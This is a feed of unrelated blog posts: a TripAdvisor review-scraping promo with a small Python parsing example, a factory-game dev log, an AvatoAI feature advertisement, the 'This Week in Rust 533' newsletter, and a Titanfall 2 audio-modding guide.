Scraping TripAdvisor reviews data means extracting customer reviews and other relevant information from the TripAdvisor platform through different web scraping methods. This process works by accessing publicly available website data and storing it in a structured format to analyze or monitor.

Various methods and tools available in the market have unique features that allow you to extract TripAdvisor hotel review data hassle-free. Here are the different types of data you can scrape from a TripAdvisor review scraper:

Hotels

Ratings

Awards

Location

Pricing

Number of reviews

Review date

Reviewer's Name

Restaurants

Images

You may want other information per your business plan, which can be easily added to your requirements.

What Are The Ways To Scrape TripAdvisor Reviews Data?

There are different web scraping methods for collecting TripAdvisor review data, depending on available resources and expertise. Let us look at them:

Scrape TripAdvisor Reviews Data Using Web Scraping API

An API helps to connect various programs to gather data without revealing the code used to execute the process. A TripAdvisor review scraping API returns data in a standard JSON format and does not require you to handle the technical details, CAPTCHAs, or maintenance yourself.

Now let us look at the complete process:

First, check if you need to install the software on your device or if it's browser-based and does not need anything. Then, download and install the desired software you will be using for restaurant, location, or hotel review scraping. The process is straightforward and user-friendly, ensuring your confidence in using these tools.

Now redirect to the web page you want to scrape data from and copy the URL to paste it into the program.

Make updates in the HTML output per your requirements and the information you want to scrape from TripAdvisor reviews.

Most tools start by extracting different HTML elements, especially the text. You can then select the categories that need to be extracted, such as Inner HTML, href attribute, class attribute, and more.

Export the data in SPSS, Graphpad, or XLSTAT format per your requirements for further analysis.
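The element-extraction step described above can be illustrated with a short Python sketch that uses only the standard library. The HTML snippet, the "review" class name, and the `ReviewExtractor` class are invented for this example and do not reflect TripAdvisor's real markup. A real page would need its own selectors, and the site's terms of service should be checked first.

```python
from html.parser import HTMLParser


class ReviewExtractor(HTMLParser):
    """Collect link href attributes and the text of <p class="review"> elements."""

    def __init__(self):
        super().__init__()
        self.links = []
        self.reviews = []
        self._in_review = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and "href" in attrs:
            self.links.append(attrs["href"])
        if tag == "p" and attrs.get("class") == "review":
            self._in_review = True
            self.reviews.append("")

    def handle_endtag(self, tag):
        if tag == "p":
            self._in_review = False

    def handle_data(self, data):
        if self._in_review:
            self.reviews[-1] += data  # inner text, nested tags flattened


# Invented sample markup for illustration only.
SAMPLE_HTML = (
    '<div><a href="/hotel/1">Hotel One</a>'
    '<p class="review">Great stay, <b>friendly</b> staff.</p>'
    "<p>Footer</p></div>"
)

extractor = ReviewExtractor()
extractor.feed(SAMPLE_HTML)
print(extractor.reviews, extractor.links)
```
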

Scrape TripAdvisor Reviews Using Python

TripAdvisor review information is analyzed to understand the experience of hotels, locations, or restaurants. Now let us help you to scrape TripAdvisor reviews using Python:

Continue reading https://www.reviewgators.com/how-web-scraping-tripadvisor-reviews-data-boosts-your-business-growth.php

#review scraping#Scraping TripAdvisor Reviews#web scraping TripAdvisor reviews#TripAdvisor review scraper

2 notes


Text

Merging

Getting the mergers in was mostly as straightforward as I was hoping. Reusing much of the same code of the splitter, albeit in sort of reverse (two inputs, rather than two outputs).

Merging the outputs of two belts is no more difficult than splitting them.

From my initial testing, I'm thinking that I'll probably want a more obvious visual difference between splitters and mergers. Probably through the use of some kind of colour-coded panelling on the texture. It should ideally be visible at-a-glance, since players will likely start understanding the visual language of the game pretty quickly (inputs are blue, outputs are green).

I need to update the build ghosts to reflect this, but the machines themselves likely need to be more obvious in function from a distance.

More UI updates in the pipeline

In a previous post I covered what I believed to be a short list of 'essential' developments to move this closer into 'game' territory. I've already taken care of one of the last remaining factory-specific developments (splitters and mergers), so next I want to include some useful UI bits when selecting machines.

Having this functionality will be useful, especially when I start adding things like the ability to switch machines on and off (good if you don't want to keep sending resources into a machine for supply issues, or to rearrange output belts).

I'm trying to make sure that the way I develop this game is mindful of the need to implement a save / load system. Most of my game objects are easily serializable. That is, I can convert their current state into a saveable JSON format or similar. I'll probably be using this format for the level data as a whole, since it's pretty easy to parse and human-readable. More on that another time, though.
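As a rough illustration of what "easily serializable" can look like, here is a small Python sketch that round-trips a list of machines through JSON. Everything in it is an assumption made for the example: the `Machine` fields, the `version` key and the function names are hypothetical, and the game itself is likely written in a different language and engine.

```python
import json
from dataclasses import dataclass, asdict


@dataclass
class Machine:
    """Hypothetical machine state: just enough to rebuild it on load."""
    kind: str          # e.g. "splitter" or "merger"
    x: int
    y: int
    rotation: int = 0
    enabled: bool = True


def save_level(machines):
    """Serialize the machines into a human-readable JSON string."""
    payload = {"version": 1, "machines": [asdict(m) for m in machines]}
    return json.dumps(payload, indent=2)


def load_level(text):
    """Rebuild Machine objects from a string produced by save_level."""
    data = json.loads(text)
    return [Machine(**entry) for entry in data["machines"]]


level = [Machine("splitter", 3, 4), Machine("merger", 5, 4, rotation=180)]
restored = load_level(save_level(level))
```

Keeping a version number in the file is one common way to leave room for format changes later; whether it is needed here depends on how the save format evolves.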

Until next time, thanks again for dropping by! :)


AvatoAI Review: Unleashing the Power of AI in One Dashboard

Here's what Avato Ai can do for you

Data Analysis:

Analyze CSV, Excel, or JSON files using Python and libraries like pandas or matplotlib.

Clean data, calculate statistical information and visualize data through charts or plots.

Document Processing:

Extract and manipulate text from text files or PDFs.

Perform tasks such as searching for specific strings, replacing content, and converting text to different formats.

Image Processing:

Upload image files for manipulation using libraries like OpenCV.

Perform operations like converting images to grayscale, resizing, and detecting shapes or

Machine Learning:

Utilize Python's machine learning libraries for predictions, clustering, natural language processing, and image recognition by uploading

Versatile & Broad Use Cases:

An incredibly diverse range of applications. From creating inspirational art to modeling scientific scenarios, to designing novel game elements, and more.

User-Friendly API Interface:

Access and control the power of this advanced AI technology through a user-friendly API.

Even if you're not a machine learning expert, using the API is easy and quick.

Customizable Outputs:

Lets you create custom visual content by inputting a simple text prompt.

The AI will generate an image based on your provided description, enhancing the creativity and efficiency of your work.

Stable Diffusion API:

Enrich Your Image Generation to Unprecedented Heights.

Stable diffusion API provides a fine balance of quality and speed for the diffusion process, ensuring faster and more reliable results.

Multi-Lingual Support:

Generate captivating visuals based on prompts in multiple languages.

Set the panorama parameter to 'yes' and watch as our API stitches together images to create breathtaking wide-angle views.

Variation for Creative Freedom:

Embrace creative diversity with the Variation parameter. Introduce controlled randomness to your generated images, allowing for a spectrum of unique outputs.

Efficient Image Analysis:

Save time and resources with automated image analysis. The feature allows the AI to sift through bulk volumes of images and sort out vital details or tags that are valuable to your context.

Advanced Recognition:

The Vision API integration recognizes prominent elements in images - objects, faces, text, and even emotions or actions.

Interactive "Image within Chat" Feature:

Say goodbye to going back and forth between screens and focus only on productive tasks.

Here's what you can do with it:

Visualize Data:

Create colorful, informative, and accessible graphs and charts from your data right within the chat.

Interpret complex data with visual aids, making data analysis a breeze!

Manipulate Images:

Want to demonstrate the raw power of image manipulation? Upload an image, and watch as our AI performs transformations, like resizing, filtering, rotating, and much more, live in the chat.

Generate Visual Content:

Creating and viewing visual content has never been easier. Generate images, simple or complex, right within your conversation.

Preview Data Transformation:

If you're working with image data, you can demonstrate live how certain transformations or operations will change your images.

This can be particularly useful for fields like data augmentation in machine learning or image editing in digital graphics.

Effortless Communication:

Say goodbye to static text as our innovative technology crafts natural-sounding voices. Choose from a variety of male and female voice types to tailor the auditory experience, adding a dynamic layer to your content and making communication more effortless and enjoyable.

Enhanced Accessibility:

Break barriers and reach a wider audience. Our Text-to-Speech feature enhances accessibility by converting written content into audio, ensuring inclusivity and understanding for all users.

Customization Options:

Tailor the audio output to suit your brand or project needs.

From tone and pitch to language preferences, our Text-to-Speech feature offers customizable options for the truest personalized experience.


#digital marketing#Avato AI Review#Avato AI#AvatoAI#ChatGPT#Bing AI#AI Video Creation#Make Money Online#Affiliate Marketing


This Week in Rust 533

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official

crates.io: API status code changes

Foundation

Google Contributes $1M to Rust Foundation to Support C++/Rust "Interop Initiative"

Project/Tooling Updates

Announcing the Tauri v2 Beta Release

Polars — Why we have rewritten the string data type

rust-analyzer changelog #219

Ratatui 0.26.0 - a Rust library for cooking up terminal user interfaces

Observations/Thoughts

Will it block?

Embedded Rust in Production ..?

Let futures be futures

Compiling Rust is testing

Rust web frameworks have subpar error reporting

[video] Proving Performance - FOSDEM 2024 - Rust Dev Room

[video] Stefan Baumgartner - Trials, Traits, and Tribulations

[video] Rainer Stropek - Memory Management in Rust

[video] Shachar Langbeheim - Async & FFI - not exactly a love story

[video] Massimiliano Mantione - Object Oriented Programming, and Rust

[audio] Unlocking Rust's power through mentorship and knowledge spreading, with Tim McNamara

[audio] Asciinema with Marcin Kulik

Non-Affine Types, ManuallyDrop and Invariant Lifetimes in Rust - Part One

Nine Rules for Accessing Cloud Files from Your Rust Code: Practical lessons from upgrading Bed-Reader, a bioinformatics library

Rust Walkthroughs

AsyncWrite and a Tale of Four Implementations

Garbage Collection Without Unsafe Code

Fragment specifiers in Rust Macros

Writing a REST API in Rust

[video] Traits and operators

Write a simple netcat client and server in Rust

Miscellaneous

RustFest 2024 Announcement

Preprocessing trillions of tokens with Rust (case study)

All EuroRust 2023 talks ordered by the view count

Crate of the Week

This week's crate is embedded-cli-rs, a library that makes it easy to create CLIs on embedded devices.

Thanks to Sviatoslav Kokurin for the self-suggestion!

Please submit your suggestions and votes for next week!

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

Fluvio - Build a new python wrapping for the fluvio client crate

Fluvio - MQTT Connector: Prefix auto generated Client ID to prevent connection drops

Ockam - Implement events in SqlxDatabase

Ockam - Output for both ockam project ticket and ockam project enroll is improved, with support for --output json

Ockam - Output for ockam project ticket is improved and information is not opaque

Hyperswitch - [FEATURE]: Setup code coverage for local tests & CI

Hyperswitch - [FEATURE]: Have get_required_value to use ValidationError in OptionExt

If you are a Rust project owner and are looking for contributors, please submit tasks here.

CFP - Speakers

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

RustNL 2024 CFP closes 2024-02-19 | Delft, The Netherlands | Event date: 2024-05-07 & 2024-05-08

NDC Techtown CFP closes 2024-04-14 | Kongsberg, Norway | Event date: 2024-09-09 to 2024-09-12

If you are an event organizer hoping to expand the reach of your event, please submit a link to the submission website through a PR to TWiR.

Updates from the Rust Project

309 pull requests were merged in the last week

add avx512fp16 to x86 target features

riscv only supports split_debuginfo=off for now

target: default to the medium code model on LoongArch targets

#![feature(inline_const_pat)] is no longer incomplete

actually abort in -Zpanic-abort-tests

add missing potential_query_instability for keys and values in hashmap

avoid ICE when is_val_statically_known is not of a supported type

be more careful about interpreting a label/lifetime as a mistyped char literal

check RUST_BOOTSTRAP_CONFIG in profile_user_dist test

correctly check never_type feature gating

coverage: improve handling of function/closure spans

coverage: use normal edition: headers in coverage tests

deduplicate more sized errors on call exprs

pattern_analysis: Gracefully abort on type incompatibility

pattern_analysis: cleanup manual impls

pattern_analysis: cleanup the contexts

fix BufReader unsoundness by adding a check in default_read_buf

fix ICE on field access on a tainted type after const-eval failure

hir: refactor getters for owner nodes

hir: remove the generic type parameter from MaybeOwned

improve the diagnostics for unused generic parameters

introduce support for async bound modifier on Fn* traits

make matching on NaN a hard error, and remove the rest of illegal_floating_point_literal_pattern

make the coroutine def id of an async closure the child of the closure def id

miscellaneous diagnostics cleanups

move UI issue tests to subdirectories

move predicate, region, and const stuff into their own modules in middle

never patterns: It is correct to lower ! to _

normalize region obligation in lexical region resolution with next-gen solver

only suggest removal of as_* and to_ conversion methods on E0308

provide more context on derived obligation error primary label

suggest changing type to const parameters if we encounter a type in the trait bound position

suppress unhelpful diagnostics for unresolved top level attributes

miri: normalize struct tail in ABI compat check

miri: moving out sched_getaffinity interception from linux'shim, FreeBSD su…

miri: switch over to rustc's tracing crate instead of using our own log crate

revert unsound libcore changes

fix some Arc allocator leaks

use <T, U> for array/slice equality impls

improve io::Read::read_buf_exact error case

reject infinitely-sized reads from io::Repeat

thread_local::register_dtor fix proposal for FreeBSD

add LocalWaker and ContextBuilder types to core, and LocalWake trait to alloc

codegen_gcc: improve iterator for files suppression

cargo: Don't panic on empty spans

cargo: Improve map/sequence error message

cargo: apply -Zpanic-abort-tests to doctests too

cargo: don't print rustdoc command lines on failure by default

cargo: stabilize lockfile v4

cargo: fix markdown line break in cargo-add

cargo: use spec id instead of name to match package

rustdoc: fix footnote handling

rustdoc: correctly handle attribute merge if this is a glob reexport

rustdoc: prevent JS injection from localStorage

rustdoc: trait.impl, type.impl: sort impls to make it not depend on serialization order

clippy: redundant_locals: take by-value closure captures into account

clippy: new lint: manual_c_str_literals

clippy: add lint_groups_priority lint

clippy: add new lint: ref_as_ptr

clippy: add configuration for wildcard_imports to ignore certain imports

clippy: avoid deleting labeled blocks

clippy: fixed FP in unused_io_amount for Ok(lit), unrachable! and unwrap de…

rust-analyzer: "Normalize import" assist and utilities for normalizing use trees

rust-analyzer: enable excluding refs search results in test

rust-analyzer: support for GOTO def from inside files included with include! macro

rust-analyzer: emit parser error for missing argument list

rust-analyzer: swap Subtree::token_trees from Vec to boxed slice

Rust Compiler Performance Triage

Rust's CI was down most of the week, leading to a much smaller collection of commits than usual. Results are mostly neutral for the week.

Triage done by @simulacrum. Revision range: 5c9c3c78..0984bec

0 Regressions, 2 Improvements, 1 Mixed; 1 of them in rollups. 17 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs entered Final Comment Period this week.

Tracking Issues & PRs

[disposition: merge] Consider principal trait ref's auto-trait super-traits in dyn upcasting

[disposition: merge] remove sub_relations from the InferCtxt

[disposition: merge] Optimize away poison guards when std is built with panic=abort

[disposition: merge] Check normalized call signature for WF in mir typeck

Language Reference

No Language Reference RFCs entered Final Comment Period this week.

Unsafe Code Guidelines

No Unsafe Code Guideline RFCs entered Final Comment Period this week.

New and Updated RFCs

Nested function scoped type parameters

Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2024-02-07 - 2024-03-06 🦀

Virtual

2024-02-07 | Virtual (Indianapolis, IN, US) | Indy Rust

Indy.rs - Ezra Singh - How Rust Saved My Eyes

2024-02-08 | Virtual (Charlottesville, NC, US) | Charlottesville Rust Meetup

Crafting Interpreters in Rust Collaboratively

2024-02-08 | Virtual (Nürnberg, DE) | Rust Nüremberg

Rust Nürnberg online

2024-02-10 | Virtual (Krakow, PL) | Stacja IT Kraków

Rust – budowanie narzędzi działających w linii komend

2024-02-10 | Virtual (Wrocław, PL) | Stacja IT Wrocław

Rust – budowanie narzędzi działających w linii komend

2024-02-13 | Virtual (Dallas, TX, US) | Dallas Rust

Second Tuesday

2024-02-15 | Virtual (Berlin, DE) | OpenTechSchool Berlin + Rust Berlin

Rust Hack n Learn | Mirror: Rust Hack n Learn

2024-02-15 | Virtual + In person (Praha, CZ) | Rust Czech Republic

Introduction and Rust in production

2024-02-19 | Virtual (Melbourne, VIC, AU) | Rust Melbourne

February 2024 Rust Melbourne Meetup

2024-02-20 | Virtual | Rust for Lunch

Lunch

2024-02-21 | Virtual (Cardiff, UK) | Rust and C++ Cardiff

Rust for Rustaceans Book Club: Chapter 2 - Types

2024-02-21 | Virtual (Vancouver, BC, CA) | Vancouver Rust

Rust Study/Hack/Hang-out

2024-02-22 | Virtual (Charlottesville, NC, US) | Charlottesville Rust Meetup

Crafting Interpreters in Rust Collaboratively

Asia

2024-02-10 | Hyderabad, IN | Rust Language Hyderabad

Rust Language Develope BootCamp

Europe

2024-02-07 | Cologne, DE | Rust Cologne

Embedded Abstractions | Event page

2024-02-07 | London, UK | Rust London User Group

Rust for the Web — Mainmatter x Shuttle Takeover

2024-02-08 | Bern, CH | Rust Bern

Rust Bern Meetup #1 2024 🦀

2024-02-08 | Oslo, NO | Rust Oslo

Rust-based banter

2024-02-13 | Trondheim, NO | Rust Trondheim

Building Games with Rust: Dive into the Bevy Framework

2024-02-15 | Praha, CZ - Virtual + In-person | Rust Czech Republic

Introduction and Rust in production

2024-02-21 | Lyon, FR | Rust Lyon

Rust Lyon Meetup #8

2024-02-22 | Aarhus, DK | Rust Aarhus

Rust and Talk at Partisia

North America

2024-02-07 | Brookline, MA, US | Boston Rust Meetup

Coolidge Corner Brookline Rust Lunch, Feb 7

2024-02-08 | Lehi, UT, US | Utah Rust

BEAST: Recreating a classic DOS terminal game in Rust

2024-02-12 | Minneapolis, MN, US | Minneapolis Rust Meetup

Minneapolis Rust: Open Source Contrib Hackathon & Happy Hour

2024-02-13 | New York, NY, US | Rust NYC

Rust NYC Monthly Mixer

2024-02-13 | Seattle, WA, US | Cap Hill Rust Coding/Hacking/Learning

Rusty Coding/Hacking/Learning Night

2024-02-15 | Boston, MA, US | Boston Rust Meetup

Back Bay Rust Lunch, Feb 15

2024-02-15 | Seattle, WA, US | Seattle Rust User Group

Seattle Rust User Group Meetup

2024-02-20 | San Francisco, CA, US | San Francisco Rust Study Group

Rust Hacking in Person

2024-02-22 | Mountain View, CA, US | Mountain View Rust Meetup

Rust Meetup at Hacker Dojo

2024-02-28 | Austin, TX, US | Rust ATX

Rust Lunch - Fareground

Oceania

2024-02-19 | Melbourne, VIC, AU + Virtual | Rust Melbourne

February 2024 Rust Melbourne Meetup

2024-02-27 | Canberra, ACT, AU | Canberra Rust User Group

February Meetup

2024-02-27 | Sydney, NSW, AU | Rust Sydney

🦀 spire ⚡ & Quick

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

My take on this is that you cannot use async Rust correctly and fluently without understanding Arc, Mutex, the mutability of variables/references, and how async and await syntax compiles in the end. Rust forces you to understand how and why things are the way they are. It gives you minimal abstraction to do things that could’ve been tedious to do yourself.

I got a chance to work on two projects that drastically forced me to understand how async/await works. The first one is to transform a library that is completely sync and only requires a sync trait to talk to the outside service. This all sounds fine, right? Well, this becomes a problem when we try to port it into browsers. The browser is single-threaded and cannot block the JavaScript runtime at all! It is arguably the most weird environment for Rust users. It is simply impossible to rewrite the whole library, as it has already been shipped to production on other platforms.

What we did instead was rewrite the network part using async syntax, but using our own generator. The idea is simple: the generator produces a future when called, and the produced future can be awaited. But! The produced future contains an arc pointer to the generator. That means we can feed the generator the value we are waiting for, then the caller who holds the reference to the generator can feed the result back to the function and resume it. For the browser, we use the native browser API to derive the network communications; for other platforms, we just use regular blocking network calls. The external interface remains unchanged for other platforms.

Honestly, I don’t think any other language out there could possibly do this. Maybe C or C++, but which will never have the same development speed and developer experience.

I believe people have already mentioned it, but the current asynchronous model of Rust is the most reasonable choice. It does create pain for developers, but on the other hand, there is no better asynchronous model for Embedded or WebAssembly.

– /u/Top_Outlandishness78 on /r/rust

Thanks to Brian Kung for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust


Audio Editing Process

Hey all, just thought I'd make a post regarding the process I used to make the new audio for the Northstar Client mod I'm working on.

Really quick here are some helpful sites

First, the software. You'll need to download

Audacity

Northstar Client (NC. Also I'm using the VTOL version)

Steam

Titanfall 2

Legion+ (from same site as NC)

Titanfall.vpk (also from NC)

Visual Studio Code (for making changes to .json files if necessary)

And that should be about it for now. Feel free to use whatever audio program you want. I just use Audacity cuz it's free and easy to use.

NOTE: if you want to skip a lot of headache and cut out the use of Legion+ and Tfall.vpk you can download a mod from Thunderstore.io and then just replace all the audio files with your new ones

This makes pulling a copy of an original unedited file for changes (if necessary) super easy, as well as making the exported file easy to find

Step 1.

First you'll want to get organized. Create a folder for all your mod assets, existing or otherwise and try to limit any folders within to a depth of one to make them easier to navigate/find stuff.

Example being:

<path>/mod_folder

|-->voicelines_raw (place all your audio in here)

|-->voicelines_edited (export to this folder)

|-->misc (add however many folders you need)

Above is an example of a folder with a depth of 1
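If you'd rather script the folder setup than click through it, here's a minimal Python sketch that creates the same layout. The function name `create_mod_folders` is made up for this example, and the folder names are just the ones from the tree above; swap in whatever you actually use.

```python
from pathlib import Path

# Folder names taken from the example tree; "misc" stands in for any extras.
SUBFOLDERS = ("voicelines_raw", "voicelines_edited", "misc")


def create_mod_folders(root):
    """Create the mod folder and its depth-1 subfolders, returning their paths."""
    root = Path(root)
    created = []
    for name in SUBFOLDERS:
        folder = root / name
        # exist_ok=True makes it safe to run again on an existing project
        folder.mkdir(parents=True, exist_ok=True)
        created.append(folder)
    return created
```

Calling `create_mod_folders("mod_folder")` makes everything relative to the current directory, and running it a second time won't overwrite anything.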

First select your audio from the file you created earlier and import it into Audacity

Step 2.

Put any and all audio into their proper folder and open Audacity.

For my project I need to have some voicelines made separately for when inside the titan, and when outside.

These instances are prefaced with a file tag "auto" and look like this

diag_gs_titanNorthstar_prime_autoEngageGrunt

Inside "audio" in the mod folder you will see a list of folders followed by .json files. WE ONLY WANT TO CHANGE THE FOLDERS.

Open an audio folder and delete the audio file within, or keep it as a sound reference if you're using Legion+ or Titanfall vpk.

Step 3.

Edit your audio

Click this button and open your audio settings to make sure they're correct. REMINDER: 48000 Hz and on Channel 2 (stereo)

As you can see, I forgot to change this one to channel two. Another important note: you'll want to change the Project Sample Rate with the dropdown as pictured, and not just the default sample rate.

In this example I needed to make the voiceline sound like it was over a radio and I accomplished that by using the filter and curve EQ. This ended up being a scrapped version of the voiceline so be sure to play around and test things to make sure they sound good to you!

Afterwards your audio may look like this. If you're new, this is bad and it sounds like garbage when it's exported, but luckily it's an easy fix!

Navigate to the effects panel and use Clip Fix. Play around with this until the audio doesn't sound like crap.

Much better! Audio is still peaking in some sections but now it doesn't sound like it's being passed through a $10 USD mic inside a turbojet engine.

Next you'll need to make sure you remove any metadata as it will cause an ear piercing static noise in-game if left in. Find it in the Edit tab.

Make sure there's nothing in the Value field and you're good to go!

Export your project as a WAV and select the dedicated output folder

Keep your naming convention simple and consistent! If you're making multiple voicelines for a single instance then be sure to give them an end tag like _01 as demonstrated in the picture above.
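If you want to double-check an exported file without reopening Audacity, here's a small Python sketch using the standard-library `wave` module to confirm the 48000 Hz / stereo settings mentioned earlier. The function name `check_wav` is made up for this example. It assumes a plain PCM WAV export, since `wave` may reject other encodings, and it does not look at metadata at all.

```python
import wave

EXPECTED_RATE = 48000     # Hz, per the reminder in Step 3
EXPECTED_CHANNELS = 2     # stereo


def check_wav(path):
    """Return a list of problems found in the WAV header (empty if it looks fine)."""
    problems = []
    with wave.open(str(path), "rb") as wav:
        rate = wav.getframerate()
        channels = wav.getnchannels()
    if rate != EXPECTED_RATE:
        problems.append(f"sample rate is {rate} Hz, expected {EXPECTED_RATE} Hz")
    if channels != EXPECTED_CHANNELS:
        problems.append(f"file has {channels} channel(s), expected {EXPECTED_CHANNELS}")
    return problems
```

Point it at a file in your export folder, e.g. `check_wav("voicelines_edited/some_line_01.wav")` (a hypothetical file name), and an empty list means the header matches the settings above.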

Step 4.

You're almost done! Now you can take audio from the export folder and copy+paste it right into the proper folder within the mod. You can delete the original audio from the mod folder at any time.

Also you won't need to make any changes to the .json files either unless you're creating a mod from scratch

NOTE: As of right now I have not resolved the issue of audio only playing out of one ear. I will make an update post about this once I have found a solution. Further research leads me to believe that the mod I am using is missing some files, but recreating those is really easy once you know where to look. Hint: it's in the extracted vpk files

#modding#mods#titanfall#titanfall 2#titanfallmoddy#audio editing#northstar client#northstar#vpk#legion+
